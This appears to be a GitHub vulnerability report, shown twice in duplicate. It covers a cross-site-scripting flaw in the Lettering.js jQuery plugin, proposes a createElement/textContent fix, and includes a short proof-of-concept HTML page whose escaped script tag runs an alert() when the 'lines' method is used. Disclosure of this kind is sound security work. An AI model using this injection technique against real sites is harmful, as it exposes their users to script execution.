The injector first extracts the DOM text representation, then inserts it into HTML:
|
inject += '<span class="'+klass+(i+1)+'" aria-hidden="true">'+item+'</span>'+after; |
Thus even when the server properly escapes user input, calling lettering on these DOM nodes converts it back to HTML, allowing for cross-site-scripting (XSS).
This is probably only exploitable in the "lines" and "words" methods, because the default method splits into characters, and the
< in
<span><</span> is parsed as text by browsers.
Solution
Create the <span> programmatically using document.createElement and set the content using textContent.
Exploit
<!doctype html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script>
<script src="./jquery.lettering.js"></script>
</head>
<body>
<div id="exploitme"><script>alert("I'm properly escaped HTML");</script></div>
<script>
jQuery('#exploitme').lettering('lines');
</script>
</body>
</html>A popup showing "I'm properly escaped HTML" will open, thus arbitrary code execution is achieved. Tested in Firefox 75.0 and Chromium 81.0.4044.113.
The injector first extracts the DOM text representation, then inserts it into HTML:
Lettering.js/jquery.lettering.js
Line 20 in d06bb73
Thus even when the server properly escapes user input, calling lettering on these DOM nodes converts it back to HTML, allowing for cross-site-scripting (XSS).
This is probably only exploitable in the "lines" and "words" methods, because the default method splits into characters, and the
<in<span><</span>is parsed as text by browsers.Solution
Create the
<span>programmatically usingdocument.createElementand set the content usingtextContent.Exploit
A popup showing "I'm properly escaped HTML" will open, thus arbitrary code execution is achieved. Tested in Firefox 75.0 and Chromium 81.0.4044.113.